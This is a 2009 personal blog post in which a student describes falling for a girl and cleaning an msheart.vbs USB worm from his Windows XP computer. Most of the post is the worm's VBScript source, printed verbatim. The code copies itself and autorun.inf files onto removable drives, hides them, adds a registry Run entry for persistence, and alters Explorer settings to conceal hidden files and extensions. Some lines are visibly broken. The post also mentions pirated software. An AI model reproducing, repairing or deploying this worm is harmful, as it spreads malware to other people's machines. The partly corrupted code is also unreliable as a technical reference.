The angel come for me, call me from the sadness and the other story of Virus.

Diposting oleh Tech Breaker on Selasa, 31 Maret 2009

I think this night is the best night in this week. Hihi... do you want to know ??? Because she want to chat with me. Just with me & she wrote this into someplace. Oh.. But sorry I don't want to tell you, and you won't care about it.

Beside that, I got a trouble. My computer with OS Windows XP infected by msheart.vbs because my friend. He borrow my Flash Disk & and open it using Double Click. And the virus take over my computer because he open it in my Admin Account. The registry was damaged. The files setting can't show hidden files, hefff..

First time, I think I must re-install my OS again, but I am too lazy to find my Windows XP SP2 Pirate Edition *not origional one :P*.

First, I try to scan with AVG Internet Security *not origional one again* because I am just High School Student, I don't have enough money to buy the license. Hehe...

But it doesn't effective. AVG Internet Security doesn't find anything in my Flash Disk and My Computer. I feel dissapointed because I have reported this virus 1 month ago to AVG.

After that, I uninstall my AVG & try to use my skill in batch file programming. This time, I fell lucky because the virus doesn't disable CMD (Command Prompt) application. Huff... I will start using CMD but I dont concentrate because I am very happy after chat with "her" and tell some jokes. Hehe..

I try to use this :

ATTRIB -H -R -S %1\*.* /S /D

I save it in Batch File. The function is to show the hidden or super hidden files into normal attribute files. Yuuuhuuu.. the virus shown his self and I can see autorun.inf in my C:,D:, and E:. YAAA ~ HAAA.....

I search it with Search Application in Windows. And I found in "C:\WINDOWS\system32\dllcache". The name file is ".vbe". First, I save it into text document to analysis it.

This is the body of this virus :

 
on error resume next
dim mylove,wincrak,Usbdrive,Naruto,mf,sex,tf,egp,nt,check,sd,Drive,Root,fname,pic 
sex = "By`DEWI"&vbcrlf&"[autorun]"&vbcrlf&"systemID=rmhrvhgt.exe"&vbcrlf&"open=wscript.exe .\mshearts.vbs"&vbcrlf&"shell\open=open"&vbcrlf&"shell\open\Command=wscript.exe .\mshearts.vbs"&vbcrlf&"shell\open\Default=1"&vbcrlf&"shell\explore=explore"&vbcrlf&"shell\explore\Command=wscript.exe .\mshearts.vbs"
set Naruto = createobject("Scripting.FileSystemObject")
set mf = Naruto.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mylove=mylove&text.readline
mylove=mylove & vbcrlf
loop
Drive =
Set Root = CreateObject("Scripting.FileSystemObject"). _
GetDrive(Drive).RootFolder
Set fname = New RegExp
With fname
.Pattern = "
.IgnoreCase = True
.Global = False
.Multiline = False
End With
Call Rename(Root, fname)
Sub Rename(Folder, RegExp)
Dim SubFolder, File
For Each File in Folder.Files
If RegExp.Test(File.Name) Then
File.Name = RegExp.Replace(File.Name, ".exe")'‚g‚r‚o
End If
Next
For Each SubFolder In Folder.SubFolders
Call Rename(SubFolder, RegExp)
Next
end sub
do
Set wincrak = Naruto.getspecialfolder(0)
set tf = Naruto.getfile(wincrak & "\system32\dllcache\.vbe")
tf.attributes = 32
set tf=Naruto.createtextfile(wincrak & "\system32\dllcache\.vbe",2,true)
tf.write mylove
tf.close
set tf = Naruto.getfile(wincrak & "\system32\dllcache\.vbe")
tf.attributes = 39
for each Usbdrive in Naruto.drives
If (Usbdrive.drivetype = 1 or Usbdrive.drivetype = 2) and Usbdrive.path <> "A:" then
set tf=Naruto.createtextfile("c:\Documents and Settings\All Users\Desktop\I'M here.htm",2,true)
tf.write pic
tf.close
set tf=Naruto.getfile("e:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("e:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("e:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("e:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("e:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("e:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("f:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("f:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("f:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("f:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("f:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("f:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("g:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("g:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("g:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("g:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("g:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("g:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("h:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("h:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("h:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("h:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("h:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("h:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("i:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("i:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("i:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("i:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("i:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("i:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("j:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("j:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("j:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("j:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("j:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("j:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("k:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("k:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("k:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("k:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("k:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("k:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("l:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("l:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("l:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("l:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("l:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("l:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("m:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("m:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("m:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("m:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("m:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("m:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("n:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("n:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("n:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("n:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("n:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("n:\autorun.inf")
tf.attributes=39
set tf=Naruto.getfile("o:\mshearts.vbs")
tf.attributes =32
set tf=Naruto.createtextfile("o:\mshearts.vbs",2,true)
tf.write mylove
tf.close
set tf=Naruto.getfile("o:\mshearts.vbs")
tf.attributes =39
set tf =Naruto.getfile("o:\autorun.inf")
tf.attributes = 32
set tf=Naruto.createtextfile("o:\autorun.inf",2,true)
tf.write sex
tf.close
set tf =Naruto.getfile("o:\autorun.inf")
tf.attributes=39
end if
next
set tf = CreateObject("WScript.Shell")
ss = "HKCR\.abg\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"abgfile",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"Application",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
tf.Regwrite ss & "NeverShowExt" ,"",dv2
set teror = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\"
dv2 ="REG_SZ"
teror.Regwrite ss & "IsShortcut" ,"",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\DefaultIcon\"
dv2 ="REG_EXPAND_SZ"
tf.Regwrite ss & "" ,"%SystemRoot%\system32\SHELL32.dll,3",dv2
set tf = CreateObject("WScript.Shell")
ss = "HKCR\abgfile\shell\open\command\"
dv2 ="REG_SZ"
tf.Regwrite ss & "" ,"winhlp32.exe %1",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"
dv2 ="REG_SZ"
egp.Regwrite ss & "load" ,"c:\windows\system32\dllcache\.vbe",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "CheckedValue" ,"0",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "DefaultValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\NOHIDDEN\SHOWALL\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "CheckedValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\NOHIDDEN\SHOWALL\"
dv2 ="REG_SZ"
egp.Regwrite ss & "DefaultValue" ,"2",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "Hidden" ,"0",dv2
set egp = CreateObject("WScript.Shell")
ss = "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
dv2 ="REG_DWORD"
egp.Regwrite ss & "HideFileExt" ,"1",dv2
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run wincrak&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Wowwww.. too long ?? Ahh.. I dont think so. This is just normal vbs virus. Do you know the definition of VBS ? It is Visual Basic Script.
I am not too understand about VBS language, but I think I can create the antivirus using batch file or VBS. But I think I will continue my project tomorrow, because I feel sleepy.

Ahh.. I hope this day I will dream "her" in my sleep.

My Journal in 31st March 2009


==================================================================

Second Day....

Today, finally I finish my VBScript to delete msheart.vbs virus from My Computer, you can trace back location of virus & fixed your registry by your self. If I have time, I will upload my VBScript to delete msheart.vbs virus.

Haha... because of her, I have a spirit to do that. Hehe... wow.. now it is ten past twenty minutes PM. I start feel sleep. But today she doesn't OL. I miss her... haha...

See my next post about Computer News

My Journal in 1st April 2009

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)